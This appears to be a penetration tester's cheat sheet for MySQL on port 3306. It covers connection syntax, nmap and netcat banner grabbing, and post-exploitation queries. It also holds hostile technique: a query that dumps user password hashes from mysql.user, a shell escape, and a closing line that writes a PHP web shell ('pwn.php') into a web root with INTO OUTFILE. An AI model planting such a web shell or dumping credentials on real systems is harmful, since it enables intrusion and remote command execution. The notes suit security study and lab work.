3306 - MYSQL

PRIMARY CATEGORY → PROTOCOLS AND SERVICES

Theory

MySQL → My Structured Query Language

It is a SQL relational database management system developed and supported by Oracle

MariaDB

It is an Open Source Fork of MySQL

Ports

TCP

• 3306

This port is used to manage communications between MySQL Clients and the Database Server

It allows scripts, tools or database connectors (PHP, Python…) to communicate with the MySQL Server

Default Databases

Mysql

It is the system database that contains tables that store information required by the MySQL Server

Information_schema

It provides access to database metadata

Performance_schema

It is a feature for monitoring MySQL Server execution at a low level

Sys

A set of objects that helps DBAs and developers interpret data collected by the [[#Default Databases#Performance_schema|Performance_schema]]

---

Connection

MySQL CLI Client

Local MySQL Server

mysql --user=<USERNAME> --password='<PASSWORD>' # Long Format
mysql -u <USERNAME> -p'<PASSWORD>' # Short Format

• To connect to a specific database →

--database Option

mysql --user=<USERNAME> --password='<PASSWORD>' --database=<DB_NAME> # Long Format
mysql -u <USERNAME> -p'<PASSWORD>' -D <DB_NAME> # Short Format

Remote MySQL Server

mysql --user=<USERNAME> --password='<PASSWORD>' --host=<TARGET> # Long Format
mysql -u <USERNAME> -p'<PASSWORD>' -h <TARGET> # Short Format

Specific Database Connection →

--database Option

mysql --user=<USERNAME> --password='<PASSWORD>' --host=<TARGET> --database=<DB_NAME> # Long Format
mysql -u <USERNAME> -p'<PASSWORD>' -h <TARGET> -D <DB_NAME> # Short Format

---

Enumeration

Banner Grabbing

Netcat

nc -vn <TARGET> 3306

Telnet

telnet <TARGET> 3306

Nmap

nmap -p<PORT> -sC -sV -n -Pn --disable-arp-ping <TARGET>

nmap -p<PORT> -sV --script sql* <TARGET>

---

Post-Exploitation

MySQL Commands

Check the MySQL/MariaDB Version

> select version();

> select @@VERSION;

The @@ prefix refers to System or Session Variables

Check the Current Database Name

> select database();

Check the Current Database User

> select user();

List all Existing Database Users

> select user,password,host from mysql.user;

List all Existing Databases

> show databases;

> select schema_name from information_schema.schemata;

Use a Specific Database

> use <DB_NAME>;

> connect <DB_NAME>;

List all the Tables in a Database

> use <DB_NAME>;
> show tables;

> select table_name from information_schema.tables where table_schema='<DB_NAME>';

List All Columns of a Table

> use <DB_NAME>;
> describe <TABLE_NAME>;

> describe <DB_NAME>.<TABLE_NAME>

> show columns from <DB_NAME>.<TABLE_NAME>

> select column_name from information_schema.columns where table_name='<TABLE_NAME>' and table_schema='<DB_NAME>';

MySQL Permissions Enumeration

Show the Permissions of the Current User

> show grants;

> show grants for CURRENT_USER;

Show the Permissions of a Specific User

> show grants for '<USERNAME>'@'<HOST>';

Execute Commands inside MySQL CLI

> \! <COMMAND>

---

Read/Write Local Files

Only users with the FILE Privilege are allowed to carry out import and export data operations

Additionally, there is a global system variable secure_file_priv that also limits the effect of the import and export operations

Its assigned value can queried as follows →

> SHOW GLOBAL VARIABLES LIKE 'secure_file_priv'

And it may be set as →

• Empty → No effect (Not a secure setting)

• Name of a directory → Import and export data operations limited to that directory

• NULL → Import and export operations disabled

Read

> SELECT LOAD_FILE('<PATH>');

Important

Be aware that, by default, MySQL does not allow arbitrary file read due to the value of the secure_file_priv global variable

Write

> SELECT "<STRING>" INTO OUTFILE '<PATH>';

e.g.

SELECT '<?php system($_GET[0]); ?>' INTO OUTFILE 'C:\\xampp\\htdocs\\pwn.php';